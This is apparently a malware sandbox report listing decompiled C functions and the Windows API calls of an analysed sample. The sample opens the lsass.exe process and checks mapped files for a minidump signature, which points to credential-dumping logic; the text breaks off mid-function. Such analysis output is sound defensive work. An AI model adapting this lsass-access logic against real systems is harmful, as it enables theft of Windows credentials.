      • Part of subcall function 00F6724C: DecodePointer.KERNEL32(?,00F6C038,00000314,00000000), ref: 00F67363
      • Part of subcall function 00F6724C: DecodePointer.KERNEL32(?), ref: 00F6737D
      • Part of subcall function 00F6724C: DecodePointer.KERNEL32(00F6C038,00000314,00000000), ref: 00F67391
    • GetStdHandle.KERNEL32(000000F4,00000001,00000000,00000000), ref: 00F65145
    • _strlen.LIBCMT ref: 00F65182
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00F65191
      • Part of subcall function 00F65F8E: IsDebuggerPresent.KERNEL32 ref: 00F67957
      • Part of subcall function 00F65F8E: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F6796C
      • Part of subcall function 00F65F8E: UnhandledExceptionFilter.KERNEL32(00F698EC), ref: 00F67977
      • Part of subcall function 00F65F8E: GetCurrentProcess.KERNEL32(C0000409), ref: 00F67993
      • Part of subcall function 00F65F8E: TerminateProcess.KERNEL32(00000000), ref: 00F6799A
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 80%
    			E00F61041(void** __edi) {
    				signed int _v4;
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _v20;
    				void* __esi;
    				void* _t15;
    				signed int _t18;
    				void* _t20;
    				intOrPtr _t23;
    				void* _t26;
    				intOrPtr _t29;
    				void* _t32;
    				signed int _t35;
    				void** _t40;
    				WCHAR* _t43;
    
    				_t40 = __edi;
    				_v4 = _v4 & 0x00000000;
    				_push(8);
    				_push(0x40);
    				_t43 = L"kernel32";
    				_t15 =  *(GetProcAddress(GetModuleHandleW(_t43), "LocalAlloc"))();
    				 *__edi = _t15;
    				if(_t15 != 0) {
    					_t35 = _v4;
    					 *_t15 = _t35;
    					_t18 = _t35;
    					if(_t18 == 0) {
    						_v12 = 1;
    						goto L11;
    					} else {
    						_t20 = _t18 - 1;
    						if(_t20 == 0) {
    							L6:
    							_push(4);
    							_push(0x40);
    							_t23 =  *(GetProcAddress(GetModuleHandleW(_t43), "LocalAlloc"))();
    							 *((intOrPtr*)( *_t40 + 4)) = _t23;
    							if(_t23 == 0) {
    								goto L12;
    							} else {
    								 *((intOrPtr*)( *((intOrPtr*)( *_t40 + 4)))) = _v8;
    								_v20 = 1;
    							}
    						} else {
    							_t26 = _t20 - 1;
    							if(_t26 == 0) {
    								_push(4);
    								_push(0x40);
    								_t29 =  *(GetProcAddress(GetModuleHandleW(_t43), "LocalAlloc"))();
    								 *((intOrPtr*)( *__edi + 4)) = _t29;
    								if(_t29 == 0) {
    									goto L12;
    								} else {
    									_push(_v8);
    									_v20 = E00F61487( *((intOrPtr*)( *__edi + 4)));
    									L11:
    									if(_v12 == 0) {
    										goto L12;
    									}
    								}
    							} else {
    								_t32 = _t26 - 1;
    								if(_t32 == 0 || _t32 == 3) {
    									goto L6;
    								} else {
    									L12:
    									LocalFree( *_t40);
    								}
    							}
    						}
    					}
    				}
    				return _v12;
    			}

    APIs
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000008,00000001,00000000,00000001,?,00F62C36,00000001,00000000), ref: 00F6105E
    • GetProcAddress.KERNEL32(00000000,?,00F62C36,00000001,00000000), ref: 00F61067
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000004,?,00F62C36,00000001,00000000), ref: 00F6109A
    • GetProcAddress.KERNEL32(00000000,?,00F62C36,00000001,00000000), ref: 00F6109D
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000004,?,00F62C36,00000001,00000000), ref: 00F610C9
    • GetProcAddress.KERNEL32(00000000,?,00F62C36,00000001,00000000), ref: 00F610CC
      • Part of subcall function 00F61487: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000008,00F6CD68,00F610E7,?,?,00F62C36,00000001,00000000), ref: 00F61498
      • Part of subcall function 00F61487: GetProcAddress.KERNEL32(00000000,?,00F62C36,00000001,00000000), ref: 00F6149F
      • Part of subcall function 00F61487: CreateFileMappingW.KERNEL32(C0000225,00000000,00000002,00000000,00000000,00000000,?,00F62C36,00000001,00000000), ref: 00F614B7
      • Part of subcall function 00F61487: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00F62C36,00000001,00000000), ref: 00F614CE
    • LocalFree.KERNEL32(00F6CD68,?,00F62C36,00000001,00000000), ref: 00F610FF
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 79%
    			E00F65C3A(intOrPtr* _a4, int _a8, signed int _a12, char* _a16, int _a20, short* _a24, int _a28, int _a32, intOrPtr _a36) {
    				signed int _v8;
    				int _v12;
    				int _v16;
    				int _v20;
    				void* _v32;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t67;
    				int _t73;
    				short* _t75;
    				short* _t77;
    				short* _t78;
    				signed int _t81;
    				void* _t83;
    				int _t84;
    				int _t86;
    				signed int _t88;
    				void* _t90;
    				short* _t91;
    				char* _t96;
    				int _t99;
    				signed int _t108;
    				signed int _t109;
    				int _t112;
    				signed int _t113;
    				signed int _t115;
    				int _t116;
    
    				_t67 =  *0xf6b940; // 0xbb40e64e
    				_v8 = _t67 ^ _t115;
    				_t109 = _a20;
    				if(_t109 <= 0) {
    					L8:
    					_v12 = 0;
    					if(_a32 == 0) {
    						_a32 =  *((intOrPtr*)( *_a4 + 4));
    					}
    					_t114 = MultiByteToWideChar;
    					_t112 = MultiByteToWideChar(_a32, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _a20, 0, 0);
    					_v20 = _t112;
    					if(_t112 != 0) {
    						if(__eflags <= 0) {
    							L21:
    							_v16 = 0;
    							L22:
    							__eflags = _v16;
    							if(_v16 == 0) {
    								goto L11;
    							}
    							_t75 = MultiByteToWideChar(_a32, 1, _a16, _a20, _v16, _t112);
    							__eflags = _t75;
    							if(_t75 == 0) {
    								L45:
    								E00F65C1A(_v16);
    								_t73 = _v12;
    								goto L46;
    							}
    							_t114 = LCMapStringW;
    							_t77 = LCMapStringW(_a8, _a12, _v16, _t112, 0, 0);
    							_v12 = _t77;
    							__eflags = _t77;
    							if(_t77 == 0) {
    								goto L45;
    							}
    							__eflags = _a12 & 0x00000400;
    							if((_a12 & 0x00000400) == 0) {
    								_t113 = _v12;
    								__eflags = _t113;
    								if(_t113 <= 0) {
    									L37:
    									_t112 = 0;
    									__eflags = 0;
    									L38:
    									__eflags = _t112;
    									if(_t112 != 0) {
    										_t78 = LCMapStringW(_a8, _a12, _v16, _v20, _t112, _v12);
    										__eflags = _t78;
    										if(_t78 != 0) {
    											_push(0);
    											_push(0);
    											__eflags = _a28;
    											if(_a28 != 0) {
    												_push(_a28);
    												_push(_a24);
    											} else {
    												_push(0);
    												_push(0);
    											}
    											_v12 = WideCharToMultiByte(_a32, 0, _t112, _v12, ??, ??, ??, ??);
    										}
    										E00F65C1A(_t112);
    									}
    									goto L45;
    								}
    								_t81 = 0xffffffe0;
    								_t109 = _t81 % _t113;
    								__eflags = _t81 / _t113 - 2;
    								if(_t81 / _t113 < 2) {
    									goto L37;
    								}
    								_t83 = _t113 + _t113 + 8;
    								__eflags = _t83 - 0x400;
    								if(_t83 > 0x400) {
    									_t84 = E00F677DC(_t109, _t113, LCMapStringW, _t83);
    									__eflags = _t84;
    									if(_t84 != 0) {
    										 *_t84 = 0xdddd;
    										_t84 = _t84 + 8;
    										__eflags = _t84;
    									}
    									_t112 = _t84;
    									goto L38;
    								}
    								E00F67870(_t83);
    								_t112 = _t116;
    								__eflags = _t112;
    								if(_t112 == 0) {
    									goto L45;
    								}
    								 *_t112 = 0xcccc;
    								_t112 = _t112 + 8;
    								goto L38;
    							}
    							_t86 = _a28;
    							__eflags = _t86;
    							if(_t86 != 0) {
    								__eflags = _v12 - _t86;
    								if(_v12 <= _t86) {
    									LCMapStringW(_a8, _a12, _v16, _t112, _a24, _t86);
    								}
    							}
    							goto L45;
    						}
    						_t88 = 0xffffffe0;
    						_t109 = _t88 % _t112;
    						__eflags = _t88 / _t112 - 2;
    						if(_t88 / _t112 < 2) {
    							goto L21;
    						}
    						_t24 = _t112 + 8; // 0x8
    						_t90 = _t112 + _t24;
    						__eflags = _t90 - 0x400;
    						if(_t90 > 0x400) {
    							_t91 = E00F677DC(_t109, _t112, MultiByteToWideChar, _t90);
    							__eflags = _t91;
    							if(_t91 == 0) {
    								L20:
    								_v16 = _t91;
    								goto L22;
    							}
    							 *_t91 = 0xdddd;
    							L19:
    							_t91 =  &(_t91[4]);
    							__eflags = _t91;
    							goto L20;
    						}
    						E00F67870(_t90);
    						_t91 = _t116;
    						__eflags = _t91;
    						if(_t91 == 0) {
    							goto L20;
    						}
    						 *_t91 = 0xcccc;
    						goto L19;
    					} else {
    						L11:
    						_t73 = 0;
    						L46:
    						return E00F65F8E(_t73, 0, _v8 ^ _t115, _t109, _t112, _t114);
    					}
    				} else {
    					_t96 = _a16;
    					_t108 = _t109;
    					while(1) {
    						_t108 = _t108 - 1;
    						if( *_t96 == 0) {
    							break;
    						}
    						_t96 =  &(_t96[1]);
    						if(_t108 != 0) {
    							continue;
    						} else {
    							_t108 = _t108 | 0xffffffff;
    							break;
    						}
    					}
    					_t99 = _t109 - _t108 - 1;
    					if(_t99 < _t109) {
    						_t99 = _t99 + 1;
    					}
    					_a20 = _t99;
    					goto L8;
    				}
    			}

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,?,?,?,00000000), ref: 00F65CAB
    • __alloca_probe_16.NTDLLP ref: 00F65CD6
    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,00000000,?,00000000,?,?,?,?,?,00000000), ref: 00F65D19
    • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,00000000), ref: 00F65D35
    • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,00000000,?,?,?,?,?,00000000), ref: 00F65D6E
    • __alloca_probe_16.NTDLLP ref: 00F65D90
      • Part of subcall function 00F677DC: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00F66195,00000000,00000001,00000000,?,00F660A2,00000018,00F69EB8,0000000C,00F66132), ref: 00F67821
    • LCMapStringW.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,?,?,?,?,00000000), ref: 00F65DD4
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?,00000000), ref: 00F65DF3
    • __freea.LIBCMT ref: 00F65DFD
    • __freea.LIBCMT ref: 00F65E06
      • Part of subcall function 00F65F8E: IsDebuggerPresent.KERNEL32 ref: 00F67957
      • Part of subcall function 00F65F8E: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F6796C
      • Part of subcall function 00F65F8E: UnhandledExceptionFilter.KERNEL32(00F698EC), ref: 00F67977
      • Part of subcall function 00F65F8E: GetCurrentProcess.KERNEL32(C0000409), ref: 00F67993
      • Part of subcall function 00F65F8E: TerminateProcess.KERNEL32(00000000), ref: 00F6799A
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 88%
    			E00F61487(void*** __esi) {
    				void* _v4;
    				void** _t7;
    				void** _t10;
    				void* _t13;
    				void* _t15;
    				long _t19;
    				void*** _t20;
    
    				_t20 = __esi;
    				_push(8);
    				_push(0x40);
    				_t19 = 0;
    				_t7 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
    				 *__esi = _t7;
    				if(_t7 != 0) {
    					 *( *__esi) = CreateFileMappingW(_v4, 0, 2, 0, 0, 0);
    					_t10 =  *__esi;
    					if( *_t10 == 0) {
    						L6:
    						E00F61503( *_t20);
    					} else {
    						_t13 = MapViewOfFile( *_t10, 4, 0, 0, 0);
    						( *__esi)[1] = _t13;
    						if(_t13 == 0) {
    							goto L6;
    						} else {
    							_t15 = ( *__esi)[1];
    							if( *_t15 != 0x504d444d ||  *((intOrPtr*)(_t15 + 4)) != 0xa793) {
    								goto L6;
    							} else {
    								_t19 = 1;
    							}
    						}
    					}
    				}
    				return _t19;
    			}

    APIs
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000008,00F6CD68,00F610E7,?,?,00F62C36,00000001,00000000), ref: 00F61498
    • GetProcAddress.KERNEL32(00000000,?,00F62C36,00000001,00000000), ref: 00F6149F
    • CreateFileMappingW.KERNEL32(C0000225,00000000,00000002,00000000,00000000,00000000,?,00F62C36,00000001,00000000), ref: 00F614B7
    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00F62C36,00000001,00000000), ref: 00F614CE
      • Part of subcall function 00F61503: UnmapViewOfFile.KERNEL32(00000002,00000000,00F61141,?,00F62DAB), ref: 00F6150E
      • Part of subcall function 00F61503: CloseHandle.KERNEL32(?,00000000,00F61141,?,00F62DAB), ref: 00F6151B
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 100%
    			E00F642E9(LONG* _a4) {
    				LONG* _t16;
    				LONG* _t17;
    				LONG* _t18;
    				LONG* _t19;
    				LONG* _t20;
    				LONG* _t21;
    				long* _t32;
    				LONG* _t34;
    
    				_t34 = _a4;
    				if(_t34 == 0) {
    					L18:
    					return _t34;
    				}
    				InterlockedDecrement(_t34);
    				_t16 = _t34[0x2c];
    				if(_t16 != 0) {
    					InterlockedDecrement(_t16);
    				}
    				_t17 = _t34[0x2e];
    				if(_t17 != 0) {
    					InterlockedDecrement(_t17);
    				}
    				_t18 = _t34[0x2d];
    				if(_t18 != 0) {
    					InterlockedDecrement(_t18);
    				}
    				_t19 = _t34[0x30];
    				if(_t19 != 0) {
    					InterlockedDecrement(_t19);
    				}
    				_t32 =  &(_t34[0x14]);
    				_a4 = 6;
    				do {
    					if( *((intOrPtr*)(_t32 - 8)) != 0xf6b52c) {
    						_t20 =  *_t32;
    						if(_t20 != 0) {
    							InterlockedDecrement(_t20);
    						}
    					}
    					if( *((intOrPtr*)(_t32 - 4)) != 0) {
    						_t21 = _t32[1];
    						if(_t21 != 0) {
    							InterlockedDecrement(_t21);
    						}
    					}
    					_t32 =  &(_t32[4]);
    					_t11 =  &_a4;
    					 *_t11 = _a4 - 1;
    				} while ( *_t11 != 0);
    				InterlockedDecrement(_t34[0x35] + 0xb4);
    				goto L18;
    			}

    APIs
    • InterlockedDecrement.KERNEL32(?,-0000006C,?,00000000,?,00F644FB,-0000006C,-0000006C,?,?,00F64574,-0000006C,00F69E28,0000000C,00F637AD), ref: 00F64303
    • InterlockedDecrement.KERNEL32(?,?,00000000,?,00F644FB,-0000006C,-0000006C,?,?,00F64574,-0000006C,00F69E28,0000000C,00F637AD), ref: 00F64310
    • InterlockedDecrement.KERNEL32(?,?,00000000,?,00F644FB,-0000006C,-0000006C,?,?,00F64574,-0000006C,00F69E28,0000000C,00F637AD), ref: 00F6431D
    • InterlockedDecrement.KERNEL32(?,?,00000000,?,00F644FB,-0000006C,-0000006C,?,?,00F64574,-0000006C,00F69E28,0000000C,00F637AD), ref: 00F6432A
    • InterlockedDecrement.KERNEL32(?,?,00000000,?,00F644FB,-0000006C,-0000006C,?,?,00F64574,-0000006C,00F69E28,0000000C,00F637AD), ref: 00F64337
    • InterlockedDecrement.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00F644FB,-0000006C,-0000006C,?,?,00F64574), ref: 00F64353
    • InterlockedDecrement.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,?,00F644FB,-0000006C,-0000006C,?,?,00F64574), ref: 00F64363
    • InterlockedDecrement.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00F644FB,-0000006C,-0000006C,?,?,00F64574), ref: 00F64379
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 100%
    			E00F6425A(LONG* _a4) {
    				LONG* _t15;
    				LONG* _t16;
    				LONG* _t17;
    				LONG* _t18;
    				LONG* _t19;
    				LONG* _t20;
    				LONG** _t30;
    				LONG* _t31;
    
    				_t31 = _a4;
    				InterlockedIncrement(_t31);
    				_t15 = _t31[0x2c];
    				if(_t15 != 0) {
    					InterlockedIncrement(_t15);
    				}
    				_t16 = _t31[0x2e];
    				if(_t16 != 0) {
    					InterlockedIncrement(_t16);
    				}
    				_t17 = _t31[0x2d];
    				if(_t17 != 0) {
    					InterlockedIncrement(_t17);
    				}
    				_t18 = _t31[0x30];
    				if(_t18 != 0) {
    					InterlockedIncrement(_t18);
    				}
    				_t6 =  &(_t31[0x14]); // 0x50
    				_t30 = _t6;
    				_a4 = 6;
    				do {
    					if( *((intOrPtr*)(_t30 - 8)) != 0xf6b52c) {
    						_t19 =  *_t30;
    						if(_t19 != 0) {
    							InterlockedIncrement(_t19);
    						}
    					}
    					if( *((intOrPtr*)(_t30 - 4)) != 0) {
    						_t20 = _t30[1];
    						if(_t20 != 0) {
    							InterlockedIncrement(_t20);
    						}
    					}
    					_t30 =  &(_t30[4]);
    					_t11 =  &_a4;
    					 *_t11 = _a4 - 1;
    				} while ( *_t11 != 0);
    				return InterlockedIncrement(_t31[0x35] + 0xb4);
    			}

    APIs
    • InterlockedIncrement.KERNEL32(00000000,00000001,?,?,?,00F6469F,?), ref: 00F6426C
    • InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F64279
    • InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F64286
    • InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F64293
    • InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F642A0
    • InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F642BC
    • InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F642CC
    • InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F642E2
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 67%
    			E00F62B7D() {
    				long _v4;
    				struct _SECURITY_ATTRIBUTES* _v8;
    				struct _SECURITY_ATTRIBUTES* _v12;
    				struct _SECURITY_ATTRIBUTES* _v16;
    				signed int _v24;
    				void* __edi;
    				void* __esi;
    				intOrPtr* _t27;
    				WCHAR* _t29;
    				signed int _t31;
    				void* _t34;
    				signed int _t37;
    				signed int _t38;
    				signed int* _t39;
    				intOrPtr _t41;
    				signed int _t42;
    				signed int _t46;
    				intOrPtr _t47;
    				signed int _t48;
    				intOrPtr _t49;
    				signed int _t57;
    				signed int _t60;
    				signed int _t69;
    				signed int _t79;
    				long _t82;
    				intOrPtr _t83;
    				signed int _t85;
    				intOrPtr _t94;
    
    				asm("sbb esi, esi");
    				_t82 = (_t79 & 0xfffff400) + 0x00001000 | 0x00000010;
    				_v8 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				_t94 =  *0xf6cd68; // 0x0
    				if(_t94 == 0) {
    					_t27 =  *0xf6cec0; // 0x0
    					_v8 = 0xc0000225;
    					if( *_t27() >= 0) {
    						_t29 =  *0xf6cd78; // 0x0
    						if(_t29 == 0) {
    							_t31 = E00F61982( &_v4);
    							__eflags = _t31;
    							if(_t31 == 0) {
    								goto L28;
    							} else {
    								_t34 = OpenProcess(_t82, 0, _v4);
    								_t85 = 1;
    								__eflags = 1;
    								goto L6;
    							}
    						} else {
    							_push(2);
    							_pop(1);
    							_t85 = 1;
    							_t34 = CreateFileW(_t29, 0x80000000, 1, 0, 3, 0, 0);
    							L6:
    							_v12 = _t34;
    							if(_t34 == 0 || _t34 == 0xffffffff) {
    								L28:
    								_t83 =  *0xf6cd68; // 0x0
    								 *0xf6cd68 = E00F6110E(_t83);
    								CloseHandle(_v12);
    							} else {
    								_push(_t34);
    								_push(1);
    								if(E00F61041(0xf6cd68) == 0) {
    									goto L28;
    								} else {
    									if(1 != 2) {
    										_t37 = GetCurrentProcess();
    										__imp__IsWow64Process(_t37,  &_v16);
    										__eflags = _t37;
    										if(_t37 == 0) {
    											L19:
    											_t38 =  *0xf6cfcc; // 0x0
    											_t57 =  *0xf6cfd0; // 0x0
    											 *0xf6cd70 = _t38;
    											_t39 =  *0xf6cfd4; // 0x0
    											 *0xf6cd6c = _t57;
    											 *0xf6cd74 = _t39;
    											goto L20;
    										} else {
    											__eflags = _v24;
    											if(_v24 != 0) {
    												goto L28;
    											} else {
    												goto L19;
    											}
    										}
    									} else {
    										_t49 =  *0xf6cd68; // 0x0
    										_t39 = E00F61526( *((intOrPtr*)( *((intOrPtr*)(_t49 + 4)))), 7);
    										if(_t39 == 0) {
    											_t57 =  *0xf6cd6c; // 0x0
    											_v16 = _t85;
    											goto L20;
    										} else {
    											_t57 = _t39[2];
    											 *0xf6cd6c = _t57;
    											 *0xf6cd70 = _t39[3];
    											 *0xf6cd74 = _t39[4];
    											_t69 =  *0xf6cfd0; // 0x0
    											if(_t57 == _t69 || _t69 >= 6 && _t57 >= 6) {
    												_v16 = 0;
    												__eflags =  *_t39;
    												_v16 = 0 |  *_t39 != 0x00000000;
    												L20:
    												__eflags = _v24;
    												if(_v24 != 0) {
    													goto L28;
    												} else {
    													__eflags =  *0xf6cd74 - 0x1f40;
    													asm("sbb eax, eax");
    													 *0xf6cf68 =  &(_t39[0]);
    													__eflags = _t57 - 6;
    													if(_t57 >= 6) {
    														L23:
    														 *0xf6cf28 = _t85;
    													} else {
    														__eflags =  *0xf6cd70 - 2;
    														 *0xf6cf28 = 0;
    														if( *0xf6cd70 < 2) {
    															goto L23;
    														}
    													}
    													_t41 =  *0xf6cd68; // 0x0
    													_t42 = E00F619EE(_t41, E00F62DC6, 0);
    													__eflags = _t42;
    													if(_t42 < 0) {
    														goto L28;
    													} else {
    														__eflags =  *0xf6bba0; // 0x0
    														if(__eflags == 0) {
    															goto L28;
    														} else {
    															__eflags =  *0xf6cd74 - 0xece;
    															_t60 = 7;
    															asm("sbb eax, eax");
    															memcpy(0xf6cfb0, 0xf6bb8c, _t60 << 2);
    															_t46 = E00F634D4(0xf6cd68, 0xf6bb8c, 0xf6bd18, 6, 0xf6cd7c,  !_t42 & 0x00f6cd80, 0);
    															__eflags = _t46;
    															if(_t46 == 0) {
    																goto L28;
    															} else {
    																_t47 =  *0xf6cec0; // 0x0
    																_t48 =  *((intOrPtr*)(_t47 + 8))(0xf6cd68, 0xf6bb8c);
    																_v16 = _t48;
    																__eflags = _t48;
    																if(_t48 < 0) {
    																	goto L28;
    																}
    															}
    														}
    													}
    												}
    											} else {
    												_v16 = _t85;
    												goto L28;
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				return _v8;
    			}

    APIs
    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F62BE8
      • Part of subcall function 00F61982: RtlInitUnicodeString.NTDLL(?,lsass.exe), ref: 00F619A4
      • Part of subcall function 00F61982: LocalFree.KERNEL32(?,?,?), ref: 00F619DF
    • OpenProcess.KERNEL32(00F6BD30,00000000,?), ref: 00F62C0C
      • Part of subcall function 00F61041: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000008,00000001,00000000,00000001,?,00F62C36,00000001,00000000), ref: 00F6105E
      • Part of subcall function 00F61041: GetProcAddress.KERNEL32(00000000,?,00F62C36,00000001,00000000), ref: 00F61067
      • Part of subcall function 00F61041: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000004,?,00F62C36,00000001,00000000), ref: 00F6109A
      • Part of subcall function 00F61041: GetProcAddress.KERNEL32(00000000,?,00F62C36,00000001,00000000), ref: 00F6109D
      • Part of subcall function 00F61041: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000004,?,00F62C36,00000001,00000000), ref: 00F610C9
      • Part of subcall function 00F61041: GetProcAddress.KERNEL32(00000000,?,00F62C36,00000001,00000000), ref: 00F610CC
      • Part of subcall function 00F61041: LocalFree.KERNEL32(00F6CD68,?,00F62C36,00000001,00000000), ref: 00F610FF
    • GetCurrentProcess.KERNEL32(?), ref: 00F62CB6
    • IsWow64Process.KERNEL32(00000000), ref: 00F62CBD
      • Part of subcall function 00F619EE: RtlInitUnicodeString.NTDLL(?,00000000), ref: 00F61AC6
      • Part of subcall function 00F619EE: LocalFree.KERNEL32(00000000), ref: 00F61ADE
      • Part of subcall function 00F619EE: _wcsrchr.LIBCMT ref: 00F61B4E
      • Part of subcall function 00F619EE: RtlInitUnicodeString.NTDLL(?,-00000002), ref: 00F61B5D
      • Part of subcall function 00F619EE: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F61C39
      • Part of subcall function 00F619EE: GetProcAddress.KERNEL32(00000000), ref: 00F61C40
      • Part of subcall function 00F619EE: LocalFree.KERNEL32(?), ref: 00F61C88
      • Part of subcall function 00F6110E: LocalFree.KERNEL32(?,?,00F62DAB), ref: 00F6112C
      • Part of subcall function 00F6110E: LocalFree.KERNEL32(00000000,?,00F62DAB), ref: 00F6112F
    • CloseHandle.KERNEL32(?), ref: 00F62DB4
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 79%
    			E00F65E67(void* __ecx, void* __edx, intOrPtr* _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
    				signed int _v8;
    				int _v12;
    				void* _v24;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t27;
    				intOrPtr _t33;
    				int _t37;
    				void* _t40;
    				short* _t41;
    				short* _t47;
    				void* _t48;
    				void* _t54;
    				int _t56;
    				void* _t57;
    				void* _t60;
    				signed int _t61;
    				short* _t62;
    
    				_t54 = __edx;
    				_push(__ecx);
    				_push(__ecx);
    				_t27 =  *0xf6b940; // 0xbb40e64e
    				_v8 = _t27 ^ _t61;
    				_t47 = 0;
    				_v12 = 0;
    				if(_a24 == 0) {
    					_a24 =  *((intOrPtr*)( *_a4 + 4));
    				}
    				_t56 = MultiByteToWideChar(_a24, 1 + (0 | _a28 != _t47) * 8, _a12, _a16, _t47, _t47);
    				if(_t56 != _t47) {
    					if(__eflags > 0) {
    						__eflags = _t56 - 0x7ffffff0;
    						if(_t56 <= 0x7ffffff0) {
    							_t16 = _t56 + 8; // 0x8
